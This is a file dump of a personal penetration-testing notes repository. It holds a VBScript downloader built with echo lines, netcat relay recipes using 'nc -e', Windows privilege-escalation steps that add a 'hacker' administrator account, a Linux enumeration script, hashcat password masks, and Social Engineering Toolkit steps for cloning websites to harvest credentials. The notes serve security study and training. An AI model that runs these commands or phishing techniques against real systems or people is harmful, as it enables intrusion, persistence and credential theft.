CreateObject("Microsoft.XMLHTTP") >> wget.vbs 14 | echo http.Open "GET", strURL, False >> wget.vbs 15 | echo http.Send >> wget.vbs 16 | echo varByteArray = http.ResponseBody >> wget.vbs 17 | echo Set http = Nothing >> wget.vbs 18 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 19 | echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 20 | echo strData = "" >> wget.vbs 21 | echo strBuffer = "" >> wget.vbs 22 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 23 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 24 | echo Next >> wget.vbs 25 | echo ts.Close >> wget.vbs 26 | -------------------------------------------------------------------------------- /images/33.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/33.png -------------------------------------------------------------------------------- /images/34.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/34.png -------------------------------------------------------------------------------- /images/35.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/35.png -------------------------------------------------------------------------------- /images/36.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/36.png -------------------------------------------------------------------------------- /images/37.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/37.png -------------------------------------------------------------------------------- /images/38.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/38.png -------------------------------------------------------------------------------- /images/39.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/39.png -------------------------------------------------------------------------------- /images/40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/40.png -------------------------------------------------------------------------------- /images/41.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/41.png -------------------------------------------------------------------------------- /images/42.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/42.png -------------------------------------------------------------------------------- /images/43.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/43.png -------------------------------------------------------------------------------- /images/44.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/44.png -------------------------------------------------------------------------------- /images/FDDI_Dual_Token_Ring.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/FDDI_Dual_Token_Ring.jpg -------------------------------------------------------------------------------- /images/ICMP-Header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ICMP-Header.png -------------------------------------------------------------------------------- /images/IP-Header-v6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/IP-Header-v6.png -------------------------------------------------------------------------------- /images/IP-Header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/IP-Header.png -------------------------------------------------------------------------------- /images/TCP-Header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/TCP-Header.png -------------------------------------------------------------------------------- /images/UDP-Header.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/UDP-Header.png -------------------------------------------------------------------------------- /images/active_passive_ftp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/active_passive_ftp.png -------------------------------------------------------------------------------- /images/arp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/arp.png -------------------------------------------------------------------------------- /images/broadcast_addresses.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/broadcast_addresses.png -------------------------------------------------------------------------------- /images/cable_categories.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/cable_categories.png -------------------------------------------------------------------------------- /images/cable_categories_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/cable_categories_2.png -------------------------------------------------------------------------------- /images/cidr.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/cidr.png -------------------------------------------------------------------------------- /images/common_ports.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/common_ports.jpg -------------------------------------------------------------------------------- /images/dns.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/dns.png -------------------------------------------------------------------------------- /images/dns_hierarchy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/dns_hierarchy.png -------------------------------------------------------------------------------- /images/dns_security.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/dns_security.png -------------------------------------------------------------------------------- /images/encapsulation_decapcultations.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/encapsulation_decapcultations.png -------------------------------------------------------------------------------- /images/fddi_basic2.gif: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/fddi_basic2.gif -------------------------------------------------------------------------------- /images/ftp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ftp.png -------------------------------------------------------------------------------- /images/how_protocal_stacks_communicate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/how_protocal_stacks_communicate.png -------------------------------------------------------------------------------- /images/how_tcp_packets_are_created.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/how_tcp_packets_are_created.png -------------------------------------------------------------------------------- /images/icmp_header_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/icmp_header_2.png -------------------------------------------------------------------------------- /images/inside_stack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/inside_stack.png -------------------------------------------------------------------------------- /images/ip6_addressing.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ip6_addressing.png -------------------------------------------------------------------------------- /images/ip6_features.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ip6_features.png -------------------------------------------------------------------------------- /images/ip6_vs_ip4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ip6_vs_ip4.png -------------------------------------------------------------------------------- /images/ip_osi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ip_osi.png -------------------------------------------------------------------------------- /images/ip_v6_addressing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ip_v6_addressing.png -------------------------------------------------------------------------------- /images/ipv6-ipv4-vs-ipv6-header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ipv6-ipv4-vs-ipv6-header.png -------------------------------------------------------------------------------- /images/mac_ip_1.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/mac_ip_1.png -------------------------------------------------------------------------------- /images/mac_ip_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/mac_ip_2.png -------------------------------------------------------------------------------- /images/network_design.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/network_design.png -------------------------------------------------------------------------------- /images/network_device.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/network_device.png -------------------------------------------------------------------------------- /images/new_breed_of_swithces.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/new_breed_of_swithces.png -------------------------------------------------------------------------------- /images/osi_model.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/osi_model.jpg -------------------------------------------------------------------------------- /images/osi_tcp_models.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/osi_tcp_models.png -------------------------------------------------------------------------------- /images/osi_vs_tcp_ip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/osi_vs_tcp_ip.png -------------------------------------------------------------------------------- /images/ping.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ping.png -------------------------------------------------------------------------------- /images/ports_protocols.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/ports_protocols.png -------------------------------------------------------------------------------- /images/private_addresses.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/private_addresses.png -------------------------------------------------------------------------------- /images/private_adresses.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/private_adresses.png -------------------------------------------------------------------------------- /images/routing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/routing.png 
-------------------------------------------------------------------------------- /images/subnet_classes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/subnet_classes.png -------------------------------------------------------------------------------- /images/tcp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/tcp.png -------------------------------------------------------------------------------- /images/tcp_close_connection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/tcp_close_connection.png -------------------------------------------------------------------------------- /images/tcp_connection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/tcp_connection.png -------------------------------------------------------------------------------- /images/tcp_header_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/tcp_header_2.png -------------------------------------------------------------------------------- /images/tcp_uses.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/tcp_uses.png -------------------------------------------------------------------------------- /images/tcp_vs_udp.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/tcp_vs_udp.png -------------------------------------------------------------------------------- /images/traceroute.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/traceroute.png -------------------------------------------------------------------------------- /images/udp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/udp.png -------------------------------------------------------------------------------- /images/udp_header_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/udp_header_2.png -------------------------------------------------------------------------------- /images/upd_uses.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/upd_uses.png -------------------------------------------------------------------------------- /images/vlan_nac.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/images/vlan_nac.png -------------------------------------------------------------------------------- /md_tree.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #File: tree-md 4 | 5 | tree=$(tree -f --noreport -I 
'*~|.*|*.png|*.pdf|*.txt|*.jpg|*.svg|*.gif|images|LICENSE|md_tree*' -L 3 --charset ascii $1 | 6 | sed -e 's/| \+/ /g' -e 's/[|`]-\+/ */g' -e 's:\(* \)\(\(.*/\)\([^/]\+\)\):\1[\4](\2):g') 7 | 8 | printf "# Penetration Testing Study Notes\n\nThis repo contains all my penetration testing study notes, penetration testing tools, scripts, techniques, tricks and also many scripts that I found them useful from all over the internet.\n\n## Table of Contents\n\n${tree}" 9 | -------------------------------------------------------------------------------- /networking/nmap_quick_reference_guide.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/networking/nmap_quick_reference_guide.pdf -------------------------------------------------------------------------------- /networking/tcpdump.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/networking/tcpdump.pdf -------------------------------------------------------------------------------- /os/preparing_windows.md: -------------------------------------------------------------------------------- 1 | # Windows machine setup 2 | 3 | I’ll install the following: 4 | 5 | 1. HxD http://mh-nexus.de/en/hxd/ 6 | 7 | 2. Evade https://www.securepla.net/antivirus-now-you-see-me-now-you-dont/ 8 | 9 | 3. Hyperion http://www.nullsecurity.net/tools/binary.html 10 | 11 | - Download/install a Windows Compiler http://sourceforge.net/projects/mingw/ 12 | - Run “make” in the extracted Hyperion folder and you should have the binary. 13 | 14 | 4. Download and install Metasploit http://www.Metasploit.com/ 15 | 16 | 5. 
Download and install either Nessus or Nexpose 17 | 18 | - If you are buying your own software, you should probably look into Nessus as it is much cheaper, but both work well 19 | 20 | 6. Download and install nmap http://nmap.org/download.html 21 | 22 | 7. Download and install oclHashcat http://hashcat.net/oclhashcat/#downloadlatest 23 | 24 | 8. Download and install evil foca http://www.informatica64.com/evilfoca/ 25 | 26 | 9. Download and install Cain and Abel http://www.oxid.it/cain.html 27 | 28 | 10. BURP http://portswigger.net/burp/download.html 29 | 30 | 11. Download and extract Nishang: https://code.google.com/p/nishang/downloads/list 31 | 32 | 12. Download and extract PowerSploit: https://github.com/mattifestation/PowerSploit/archive/master.zip 33 | 34 | 13. Installing Firefox Addons 35 | 36 | - Web Developer Add-on: https://addons.mozilla.org/en-US/firefox/addon/web-developer/ 37 | - Tamper Data: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ 38 | - Foxy Proxy: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ 39 | - User Agent Switcher: https://addons.mozilla.org/en-US/firefox/addon/user-agentswitcher/ 40 | -------------------------------------------------------------------------------- /password_attack/common_password_topologies.txt: -------------------------------------------------------------------------------- 1 | ?u?l?l?l?l?l?d?d 2 | ?u?l?l?l?l?l?l?d?d 3 | ?u?l?l?l?d?d?d?d 4 | ?l?l?l?l?l?l?l?d 5 | ?u?l?l?l?l?l?l?l?d?d 6 | ?u?l?l?l?l?l?l?d 7 | ?u?l?l?l?l?l?d?d?d?d 8 | ?u?l?l?l?l?d?d?d?d 9 | ?l?l?l?l?l?l?d?d 10 | ?u?l?l?l?l?l?l?l?d 11 | ?u?l?l?l?l?d?d?d 12 | ?u?l?l?d?d?d?d?s 13 | ?l?l?l?l?l?l?l?l 14 | ?u?l?l?l?l?l?d?d?d 15 | ?l?l?l?l?l?l?l?d?d 16 | ?l?l?s?d?d?l?d?d?l 17 | ?l?l?l?l?l?l?l?l?d 18 | ?u?l?l?l?l?l?d?d?s 19 | ?u?l?l?l?l?l?l?d?d?d?d 20 | ?u?l?l?l?l?l?l?l?l?d?d 21 | ?u?l?l?l?l?l?d?s 22 | ?u?l?l?l?l?l?l?l?l?d 23 | ?u?l?l?l?l?l?d?d?d?d?s 24 | ?l?l?l?l?l?l?l?l?l 25 | ?l?l?l?l?l?l?l?l?d?d 26 | ?u?l?l?l?l?l?l?d?d?d 27 | 
?l?l?l?l?l?d?d?d 28 | ?u?l?l?l?d?d?d?d?s 29 | ?u?l?l?l?l?l?l?l?d?d?d?d 30 | ?u?l?l?l?l?l?s?d?d 31 | ?u?u?u?u?u?u?d?l 32 | ?l?l?l?l?d?d?d?d 33 | ?d?d?u?l?l?l?l?l?l?l 34 | ?u?l?l?s?d?d?d?d 35 | ?u?l?l?l?l?d?d?s 36 | ?u?l?l?l?l?l?l?d?s 37 | ?d?d?u?l?l?l?l?l?l 38 | ?l?l?l?l?s?d?d?d 39 | ?l?l?l?l?l?l?l?l?l?d 40 | ?l?l?l?l?l?d?d?d?d 41 | ?l?l?l?l?l?l?l?l?l?l 42 | ?l?l?l?l?l?l?d?d?d 43 | ?u?l?l?l?l?l?l?l?l?l?d?d 44 | ?u?l?l?l?l?l?l?l?l?l?d 45 | ?d?d?d?d?d?d?u?l 46 | ?u?l?l?l?l?l?l?l?d?d?d 47 | ?u?l?l?l?l?l?l?d?d?s 48 | ?u?u?u?u?u?u?d?s 49 | ?u?u?d?l?l?l?d?d?d?u 50 | ?u?l?l?l?l?s?d?d 51 | ?u?l?l?l?l?l?s?d 52 | ?l?l?l?s?d?d?d?d 53 | ?l?l?l?l?l?l?d?d?d?d 54 | ?u?l?l?l?l?l?l?l?d?d?s 55 | ?d?d?u?l?l?l?l?l 56 | ?u?l?l?l?l?l?l?l?d?s 57 | ?u?l?l?l?l?d?d?d?s 58 | ?u?l?l?l?l?d?d?d?d?s 59 | ?u?l?l?l?s?d?d?d?d 60 | ?u?l?l?l?l?s?d?d?d 61 | ?u?l?l?l?l?l?l?d?d?d?d?s 62 | ?u?l?l?l?d?d?d?s 63 | ?l?l?l?l?s?d?d?d?d 64 | ?l?l?l?l?l?l?s?d?d 65 | ?l?l?l?l?l?l?d?d?s 66 | ?d?d?d?d?u?l?l?l 67 | ?d?d?d?d?d?d?d?d 68 | ?u?l?l?l?l?l?l?s?d 69 | ?u?l?d?d?d?d?d?d 70 | ?l?l?l?l?l?l?s?d 71 | ?u?d?l?l?l?l?l?l?l?d 72 | ?l?l?l?l?l?l?l?l?l?l?l 73 | ?l?l?l?l?l?l?l?l?l?l?d 74 | ?l?l?l?l?l?d?d?s 75 | ?l?l?l?l?d?d?d?s 76 | ?u?l?l?l?l?l?l?l?l?d?d?d?d 77 | ?u?u?u?u?u?u?u?u 78 | ?u?l?l?l?s?d?d?d 79 | ?u?l?l?l?l?l?l?s?d?d 80 | ?u?l?l?l?l?l?d?d?d?s 81 | ?l?l?l?l?l?s?d?d 82 | ?u?l?l?l?l?s?d?d?d?d 83 | ?u?l?l?l?d?d?d?d?d 84 | ?u?l?l?d?d?d?d?d?d 85 | ?u?l?l?d?d?d?d?d 86 | ?l?l?l?l?l?l?l?l?l?d?d 87 | ?l?l?l?l?l?l?l?d?d?s 88 | ?l?l?l?l?l?l?l?d?d?d 89 | ?l?l?l?l?l?l?d?s 90 | ?l?l?l?d?d?d?d?s 91 | ?u?u?u?l?l?l?d?d?d?d 92 | ?u?l?l?l?l?l?s?d?d?d 93 | ?u?l?l?l?l?l?l?l?s?d 94 | ?l?l?l?l?l?l?l?l?s?d 95 | ?l?l?l?l?l?l?l?d?d?d?d 96 | ?u?l?l?l?l?l?s?d?d?d?d 97 | ?l?l?l?l?l?l?l?d?s 98 | ?l?l?l?l?d?d?d?d?s 99 | ?d?d?d?d?u?l?l?l?l 100 | ?u?u?d?l?l?l?d?d?d?d 101 | -------------------------------------------------------------------------------- /port_forwarding/nc_relays.txt: 
-------------------------------------------------------------------------------- 1 | ----------LINUX---------- 2 | Create named pipe 3 | cd /tmp 4 | mknod [name] p 5 | 6 | Listener to Client----- 7 | nc -nvlp [local port] 0<[named pipe] | nc [target IP] [port] | tee [named pipe] 8 | Sends packets from [local port] to a nc client connected to [target IP] on [port] 9 | Listener to Listener----- 10 | nc -nvlp [local port 1] 0<[named pipe] | nc -nvlp [local port 2] | tee [named pipe] 11 | Sends packets from any connection on [local port 1] to any connection on [local port 2] 12 | Client to Client----- 13 | nc [previous hop] [port 1] 0<[named pipe] | nc [next hop] [port 2] | tee [named pipe] 14 | Sends packets from connection to [previous hop] on [port 1] to [next hop] on [port 2] 15 | 16 | ----------WINDOWS---------- 17 | Enter temporary directory to create .bat files 18 | cd C:\temp 19 | 20 | Listener to Client----- 21 | echo nc [target IP] [port] > relay.bat 22 | nc -lp [local port] -e relay.bat 23 | Sends packets from [local port] to a nc client connected to [target IP] on [port] 24 | Listener to Listener----- 25 | echo nc -lp [local port 2] > relay.bat 26 | nc -lp [local port 1] -e relay.bat 27 | Sends packets from any connection on [local port 1] to any connection on [local port 2] 28 | Client to Client----- 29 | echo nc [next hop] [port 2] > relay.bat 30 | nc [previous hop] [port 1] -e relay.bat 31 | Sends packets from connection to [previous hop] on [port 1] to [next hop] on [port 2] 32 | -------------------------------------------------------------------------------- /priv_escalation/Privilege_Escalation.md: -------------------------------------------------------------------------------- 1 | # Privilege Escalation 2 | 3 | ## Privilege Escalation Exploits in Linux 4 | 5 | You have ssh credentials for a user and want to use machine to pivot but you do not have root privileges 6 | 7 | * Check kernel version 8 | * look under exploit db 9 | 10 | download exploit to 
victim machine and compile 11 | 12 | ## Privilege Escalation Exploit in Windows 13 | 14 | MS11-080 Afd.sys python script 15 | 16 | `python pyinstaller.py --onefile ms11-080.py` 17 | * to convert to exe 18 | 19 | `net user hacker hacker /add` 20 | 21 | `net localgroup administrators hacker /add` 22 | 23 | ## Abusing weak Service Permissions on Windows 24 | 25 | 26 | 27 | ## Abusing weak Service Permissions on Linux 28 | -------------------------------------------------------------------------------- /priv_escalation/Privledge_Logic_Transport.md: -------------------------------------------------------------------------------- 1 | # Privilege, Transport, Logic 2 | 3 | ## Privilege 4 | 5 | Often logic, priv, auth bugs are blurred. 6 | 7 | Testing user priv: 8 | - admin has power 9 | - peon has none 10 | - peon can use function only meant for admin 11 | 12 | ## More Privilege 13 | 14 | - Find site functionality that is restricted to certain user types 15 | - Try accessing those functions with lesser/other user roles 16 | - Try to directly browse to views with sensitive information as a lesser priv user 17 | 18 | Autorize Burp plugin is pretty neat [here] (https://github.com/Quitten/Autorize). 19 | 20 | ## Common Functions or Views 21 |  22 | - Add user function 23 | - Delete user function 24 | - start project / campaign / etc function 25 | - change account info (pass, CC, etc) function 26 | - customer analytics view 27 | - payment processing view 28 | - any view with PII 29 | 30 | ## Insecure direct object references 31 | 32 | IDORs are common place in bounties, and hard to catch with scanners. 
33 | 34 | Find *any and all* UIDs 35 | - increment 36 | - decrement 37 | - negative values 38 | - Attempt to perform sensitive functions substituting another UID 39 | - change password 40 | - forgot password 41 | - admin only functions 42 | 43 | Common Functions , Views, or Files: 44 | - Everything from the CSRF Table, trying cross account attacks 45 | - Sub: UIDs, user hashes, or emails 46 | - Images that are non-public 47 | - Receipts 48 | - Private Files (pdfs, ++) 49 | - Shipping info & Purchase Orders 50 | - Sending / Deleting messages 51 | 52 | ## Transport 53 | 54 | Most security concerned sites will enable HTTPs. It’s your job to ensure they’ve done it *EVERYWHERE*. Most of the time they miss something. 55 | 56 | Examples: 57 | - Sensitive images transported over HTTP 58 | - Analytics with session data / PII leaked over HTTP 59 | 60 | (ForceSSL) [https://github.com/arvinddoraiswamy/mywebappscripts/tree/master/ForceSSL] 61 | 62 | ## Business Logic Flaws 63 | Logic flaws that are tricky, mostly manual: 64 | - substituting hashed parameters 65 | - step manipulation 66 | - use negatives in quantities 67 | - authentication bypass 68 | - application level DoS 69 | - Timing attacks 70 | -------------------------------------------------------------------------------- /priv_escalation/escalation_gathering.sh: -------------------------------------------------------------------------------- 1 | #Script to gathering information in a privilege escalation 2 | 3 | #!/bin/sh 4 | echo Distribution and kernel version 5 | cat /etc/issue 6 | uname -a 7 | 8 | echo Mounted filesystems 9 | mount -l 10 | 11 | echo Network configuration 12 | ifconfig -a 13 | cat /etc/hosts 14 | arp 15 | 16 | echo Development tools availability 17 | which gcc 18 | which g++ 19 | which python 20 | 21 | echo Installed packages (Ubuntu) 22 | dpkg -l 23 | 24 | echo Services 25 | netstat -tulnpe 26 | 27 | echo Processes 28 | ps -aux 29 | 30 | echo Scheduled jobs 31 | find /etc/cron* -ls 2>/dev/null 32 | 
find /var/spool/cron* -ls 2>/dev/null 33 | 34 | echo Readable files in /etc  35 | find /etc -user `id -u` -perm -u=r \ 36 | -o -group `id -g` -perm -g=r \ 37 | -o -perm -o=r \ 38 | -ls 2>/dev/null  39 | 40 | echo SUID and GUID writable files 41 | find / -o -group `id -g` -perm -g=w -perm -u=s \ 42 | -o -perm -o=w -perm -u=s \ 43 | -o -perm -o=w -perm -g=s \ 44 | -ls 2>/dev/null  45 | 46 | echo SUID and GUID files 47 | find / -type f -perm -u=s -o -type f -perm -g=s \ 48 | -ls 2>/dev/null 49 | 50 | echo Writable files outside HOME 51 | mount -l find / -path “$HOME” -prune -o -path “/proc” -prune -o \( ! -type l \) \( -user `id -u` -perm -u=w  -o -group `id -g` -perm -g=w  -o -perm -o=w \) -ls 2>/dev/null 52 | -------------------------------------------------------------------------------- /social_engineering/social_engineering.md: -------------------------------------------------------------------------------- 1 | # Social Engineering ( cybrary course ) 2 | 3 | ## Google Dorks 4 | 5 | ## Maltego 6 | 7 | This tool allows you to visualize the relationships between and among various bits of information, which Maltego calls entities, that you discover about the target of a Social Engineering Audit. 8 | 9 | ## Recon-NG is used for gathering information that is accessed through the Kali Tools Web site. 
10 | 11 | - creating and using a workspace — you can create workspaces to organize your activities on a case-by-case basis, which increases the tool’s functionality 12 | - how to show modules by running the Show Command (he recommends that you try all of the modules separately to learn a great deal about your target) 13 | - using the netcraft command 14 | - using the run command 15 | - using the load command 16 | - using the resolve command 17 | - using the add and delete commands to configure lists 18 | 19 | ## Social Engineering Toolkit (SE Toolkit) 20 | 21 | - run the SE Toolkit 22 | - trick your target into signing into a malicious Web site so that you can obtain their credentials 23 | - use Web site attack factors 24 | - perform SE attacks such as spearfishing 25 | - trick your target into providing credentials by using the credential harvester 26 | - use the tab nabbing tool 27 | - use CTRL-SHIFT-T to open a new tab in your browser 28 | - use the various templates 29 | - choose the proper Web server for your activity 30 | - clone a Web site to use to trick your target 31 | - use the tiny URL Web site to streamline your process 32 | - understand the security risks of using the tiny URL Web site 33 | - communicate with your target to trigger them to go to the cloned Web site 34 | - authenticate to the target’s true Web site using their own credentials 35 | 36 | ## Cupp (Common User Password Profiler) ( from github) 37 | 38 | This tool allows you to generate a list of possible passwords to use in the Dictionary file. The Dictionary file(s) can be expanded as more information is gathered. 39 | 40 | ## Cewl 41 | 42 | a simple and useful tool for generating word lists for use with a password cracking tool. 43 | 44 | ## Shodan (www.shodan.io) 45 | 46 | Shodan crawls the Internet and identifies IP addresses that have a service running. Then it does a banner grab of the service that is running, and it saves the banner information. 
